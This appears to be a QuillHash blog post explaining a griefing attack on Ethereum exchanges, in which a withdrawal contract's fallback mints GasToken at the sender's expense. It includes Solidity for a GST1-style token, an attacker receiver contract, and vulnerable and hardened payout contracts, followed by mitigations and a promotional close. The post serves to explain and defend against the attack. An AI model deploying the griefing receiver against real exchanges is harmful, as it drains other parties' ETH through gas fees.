Potential Attack on Ethereum Network to mint GasTokens

Ethereum Network Vulnerability

A vulnerability in the way Ethereum charges for transactions, uncovered by Level K, potentially allows bad actors to mint large amounts of GasToken at someone else's expense, or to drain the transaction sender's ETH through gas fees.

Discovered by whom?

Level K's study (a hypothetical case study rather than an observed incident) shows that a contract can mint large amounts of GasToken while receiving ETH, an ERC20 token, or any other standard token, with the sender of the transaction paying for the minting.

The vulnerability comes to light when the fallback function of a receiving contract is able to carry out arbitrary computation that the transaction originator pays for, which opens the door to "griefing".

What is a griefer?

A griefer or bad-faith player is a player in a multiplayer video game who deliberately irritates and harasses other players within the game, using aspects of the game in intended or unintended ways (according to Wikipedia). On Ethereum, the griefer's aim is to make a victim pay for computation the griefer controls.

What is GAS?

Gas is the fundamental resource that meters computation on the Ethereum blockchain: every transaction requires some amount of gas to execute, and the sender pays a price per unit of gas, which may be 1 gwei or tens to hundreds of gwei depending on network demand.

What is GasToken?

GasToken is a smart contract on the Ethereum blockchain that allows users to tokenize gas when gas prices are low and spend it when gas prices are high.

It was also the first smart contract through which a user could effectively buy and sell gas on the Ethereum network.

How does GasToken work?

GasToken takes advantage of Ethereum's storage refund. To encourage smart contracts to delete storage they no longer need, the network refunds part of the gas when a storage variable is cleared, with the total refund capped at half of the gas used by the transaction.

● If a variable is changed from zero to a non-zero value, there is a gas fee
● If a variable is changed from a non-zero value to zero, there is a gas refund

To profit from gasToken:

● Mint tokens when gasPrice is low: change a variable from a zero value to non-zero.
● Burn tokens when gasPrice is high: change a variable from non-zero to zero.

Example :

Writing permanent blockchain state costs a significant amount of gas. For instance, the SSTORE instruction costs 20000 gas when writing a non-zero value into a zero slot. Clearing that slot back to zero costs a further 5000 gas but provides a refund of 15000 gas (these are the values in force when GasToken was designed; they have since changed).

Suppose we write to storage when the gas price is gas_low and redeem the token for a refund when the gas price is gas_high. Our total expense per storage word is:

20000⋅gas_low + 5000⋅gas_high

We receive a refund per word of:

15000⋅gas_high

We can therefore expect savings whenever 15000⋅gas_high > 20000⋅gas_low + 5000⋅gas_high, that is, whenever:

gas_high > 2⋅gas_low

There are actually two versions of GasToken: GST1, which banks gas in storage slots (the variant used in the example above), and GST2, which banks gas by creating small contracts and takes advantage of the refund obtained when a whole contract is deleted with SELFDESTRUCT.


Comparison between the two versions of GasToken

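The storage-refund mechanism above in code, as an added example that is not the GasToken project's own implementation: a minimal storage-backed token in the style of GST1. The MiniGasToken name, the constant BASE used to place token slots away from the contract's own state variables, and the head/tail counters are simplifications assumed here.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example, not the GasToken project's code. A minimal GST1-style token:
// minting writes a non-zero value into fresh storage slots (paid for now, at the
// current gas price); freeing zeroes those slots, so the transaction that frees them
// collects the SSTORE clearing refund, capped at a fraction of the gas it used.
contract MiniGasToken {
    mapping(address => uint256) public balanceOf;

    uint256 private head; // number of slots ever minted; the next slot is head + 1
    uint256 private tail; // number of slots already freed (oldest live slot is tail + 1)

    // Token slots live at BASE + index. BASE is a hash, so the slots never collide
    // with the compiler-assigned slots 0..2 used by the state variables above
    // (an assumption of this toy; real GST1 uses a fixed magic offset).
    uint256 private constant BASE = uint256(keccak256("MiniGasToken.slots"));

    // Mint `n` tokens: each token is one storage slot set from zero to 1.
    // Every SSTORE here is a zero-to-non-zero write, the most expensive kind.
    function mint(uint256 n) external {
        uint256 start = head;
        for (uint256 i = 1; i <= n; i++) {
            uint256 slot = BASE + start + i;
            assembly { sstore(slot, 1) }
        }
        head = start + n;
        balanceOf[msg.sender] += n;
    }

    // Free `n` of the caller's tokens: zero the oldest live slots. Each non-zero-to-zero
    // SSTORE adds to the refund counter of the calling transaction, so the caller's
    // gas bill for the whole transaction shrinks.
    function free(uint256 n) external {
        require(balanceOf[msg.sender] >= n, "insufficient tokens");
        uint256 start = tail;
        require(start + n <= head, "not enough live slots");
        for (uint256 i = 1; i <= n; i++) {
            uint256 slot = BASE + start + i;
            assembly { sstore(slot, 0) }
        }
        tail = start + n;
        balanceOf[msg.sender] -= n;
    }
}
```

The refund only ever reduces the gas of the transaction that calls free(), which is why the token is worth holding: you mint in a cheap transaction and free inside an expensive one. Note that the arbitrage no longer works on current Ethereum: EIP-3529 (London hard fork, August 2021) cut the SSTORE clearing refund to 4800 gas, capped total refunds at one fifth of the gas used, and removed the SELFDESTRUCT refund that GST2 relied on. The griefing side of the attack, forcing a sender to pay for arbitrary computation in a fallback, does not depend on refunds and still applies.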
How does the attacker benefit?

A GasToken holder can reduce the cost of a transaction when the gas price is high by burning tokens minted when the gas price was low. The griefing attack turns this into a way of minting at someone else's expense. When an exchange processes a withdrawal, it sends ETH (or a token) from its own account to the address the user supplied, and the exchange's account pays the gas for that transaction. If the destination is a contract, the transfer invokes the contract's fallback function, and the attacker's fallback can perform arbitrary computation up to the transaction's gas limit: minting GasTokens that the attacker later burns for their own benefit, or simply burning gas. Either way the transaction originator pays, and repeated withdrawals drain the exchange's ETH in gas fees.

Two practical caveats. A plain ETH send with transfer() or send() forwards only a 2300 gas stipend, far less than the 20000 gas a single storage write costs, so minting needs a call that forwards more gas (a call with no explicit gas limit, or a hot-wallet transaction submitted with a generous gas limit). And a standard ERC20 transfer does not call the recipient's fallback at all, so tokens are affected only when they carry receiver hooks, such as ERC777's tokensReceived.

Suggestions to avoid this type of attack

Most exchanges are already aware of this type of minting attack but still fail to cover every variant. The reasons are a lack of developer awareness and the fact that existing analysis tools cannot verify every potential bug in a smart contract, especially bugs that involve external calls (including delegatecalls) to untrusted contracts. The attack is even more harmful for exchanges without a proper KYC process, since an attacker can repeatedly mint GasTokens through withdrawals from many different addresses.

An explicit gas limit should be set on every outgoing transaction, so that the worst-case cost of a withdrawal is bounded by:

required_gas_limit * gas_price

where required_gas_limit is the gas a legitimate transfer actually needs, not the block gas limit or a generous default. Withdrawals whose destination is a contract (non-empty code at the address) should be refused or flagged for manual review, and contract-level payouts should forward only a fixed gas stipend to the recipient rather than all remaining gas.
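The griefing path and the bounded-gas fix side by side, as an added example that is not code from the original post, from Level K, or from any exchange. IGasToken, GriefingReceiver, VulnerablePayout and HardenedPayout are names assumed here; IGasToken is assumed to expose a GST1-style mint(uint256) and free(uint256); the 400_000 gas margin in the receiver is an assumed safety figure, not a precise bound.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Assumed interface of a GST1-style gas token (see the storage-refund discussion above).
interface IGasToken {
    function mint(uint256 n) external;
    function free(uint256 n) external;
}

// The attacker's withdrawal address. Whatever gas the payer forwards with the payment
// is spent here minting tokens that this contract keeps and the payer pays for.
contract GriefingReceiver {
    IGasToken public immutable token;
    address public immutable owner;

    constructor(IGasToken _token) {
        token = _token;
        owner = msg.sender;
    }

    // Runs on every plain ETH transfer. Mints in batches of 10 slots while at least
    // 400_000 gas remains (an assumed margin above 10 storage writes plus overhead).
    // try/catch keeps already-minted batches if the last one runs out of gas.
    receive() external payable {
        while (gasleft() > 400_000) {
            try token.mint(10) {} catch { break; }
        }
    }

    // The attacker later frees tokens from inside their own expensive transaction,
    // so the SSTORE refund lowers the gas bill of that transaction.
    function redeem(uint256 n) external {
        require(msg.sender == owner, "not owner");
        token.free(n);
    }
}

// Vulnerable pattern: payout() is called by the exchange's hot wallet, which pays the gas
// for the whole transaction, and the call forwards all remaining gas to the recipient.
// The recipient's fallback can therefore burn up to the transaction's gas limit.
contract VulnerablePayout {
    address public immutable operator;

    constructor() { operator = msg.sender; }
    receive() external payable {}

    function payout(address payable to, uint256 amount) external {
        require(msg.sender == operator, "not operator");
        (bool ok, ) = to.call{value: amount}("");   // forwards all remaining gas
        require(ok, "payout failed");
    }
}

// Hardened pattern: forward only a fixed stipend. 2300 gas is enough to emit an event
// but far below the 20000 gas one storage write costs, so the fallback cannot mint.
// The hot wallet should additionally submit the transaction with an explicit gas limit
// sized for this function, so the worst case is required_gas_limit * gas_price.
contract HardenedPayout {
    address public immutable operator;

    constructor() { operator = msg.sender; }
    receive() external payable {}

    function payout(address payable to, uint256 amount) external {
        require(msg.sender == operator, "not operator");
        (bool ok, ) = to.call{value: amount, gas: 2300}("");
        require(ok, "payout failed");
    }
}
```

The same bound applies when the hot wallet sends ETH directly to the user's address without a payout contract: there, the gas limit on the transaction itself is the only thing that caps what the recipient's fallback can consume. The fixed stipend is a policy choice with a trade-off: some legitimate recipients (multisig wallets, for instance) need more than 2300 gas to accept ETH, so an exchange may prefer a slightly larger fixed limit plus a review step for contract destinations over an outright 2300 cap.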

At QuillHash, we understand the potential of blockchain and have a strong team of developers who can build blockchain applications such as smart contracts, dApps, smart coins, DeFi protocols and DEXes on platforms including Ethereum, EOS and Hyperledger.
